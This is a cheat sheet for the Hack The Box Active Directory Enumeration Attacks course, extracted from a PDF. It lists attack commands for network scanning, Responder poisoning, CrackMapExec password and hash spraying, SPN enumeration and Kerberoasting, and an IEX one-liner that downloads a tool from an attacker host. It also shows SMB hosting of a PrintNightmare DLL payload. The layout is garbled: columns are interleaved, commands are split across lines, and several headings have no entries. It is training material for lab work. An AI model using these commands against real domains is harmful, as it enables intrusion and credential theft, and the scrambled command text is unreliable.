Active Directory Enumeration Attacks Module Cheat Sheet HTB
Active Directory Enumeration Attacks Module Cheat Sheet HTB
ATTACKS
CHEAT SHEET
Initial Enumeration
Command Description
sudo nmap -v -A -iL hosts.txt -oN Performs an nmap scan that with OS detection,
/home/User/Documents/host-enum version detection, script scanning, and
traceroute enabled (-A) based on a list of hosts
(hosts.txt) specified in the file proceeding -iL.
Then outputs the scan results to the file
specified after the -oNoption. Performed from a
Linux-based host
Command Description
sudo git clone Uses git to clone the kerbrute tool from a Linux-
https://github.com/ropnop/kerbrute.git based host.
LLMNR/NTB-NS Poisoning
Command Description
responder -h Used to
display the
usage
instructions
and various
options
available in
Responder from
a Linux-based
host.
Command Description
$regkey = PowerShell
"HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" script used to
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path
"$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} disable NBT-
NS on a
Windows host.
sudo crackmapexec smb 172.16.5.5 Uses CrackMapExec to validate a set of credentials from
-u avazquez -p Password123 a Linux-based host.
sudo crackmapexec smb --local- Uses CrackMapExec and the --local-auth flag to ensure
auth 172.16.5.0/24 -u only one login attempt is performed from a Linux-
administrator -H
88ad09182de639ccc6579eb0849751cf based host. This is to ensure accounts are not locked
| grep + out by enforced password policies. It also filters out
logon failures using grep.
Credentialed Enumeration
Command Description
Get-DomainUser -SPN -Properties PowerView script used to find users on the target
samaccountname,ServicePrincipalName Windows ___domain that have the Service Principal
Name set. Performed from a Windows-based host.
Transfering Files
Command Description
"IEX(New-Object PowerShell
Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" one-liner used
to download a
file from a web
server.
Performed
from a
Windows-
based host.
DCSync
Command Description
Command Description
Privileged Access
Command Description
NoPac
Command Description
PrintNightmare
Command Description
Command Description
pip3 uninstall impacket git clone Used to ensure the exploit author's
https://github.com/cube0x0/impacket cd (cube0x0) version of Impacket is installed.
impacket python3 ./setup.py install
This also uninstalls any previous
Impacket version on a Linux-based host.
sudo smbserver.py -smb2support CompData Used to create an SMB server and host a
/path/to/backupscript.dll shared folder (CompData) at the specified
___location on the local linux host. This can
be used to host the DLL payload that the
exploit will attempt to download to the
host. Performed from a Linux-based host.
PetitPotam
Command Description
klist krb5-user
command used to
view the contents
of the ccache file.
Performed from a
Linux-based host.
Command Description
Miscellaneous Misconfigurations
Command Description
Command Description
ASREPRoasting
Command Description
Command Description
GetUserSPNs.py -request -target- Impacket tool used to request (-request) the TGS
___domain FREIGHTLOGISTICS.LOCAL ticket of an account in a target Windows ___domain
INLANEFREIGHT.LOCAL/wley
(-target-___domain) from a Linux-based host.
zip -r ilfreight_bh.zip *.json Used to compress multiple files into 1 single .zip
file to be uploaded into the BloodHound GUI.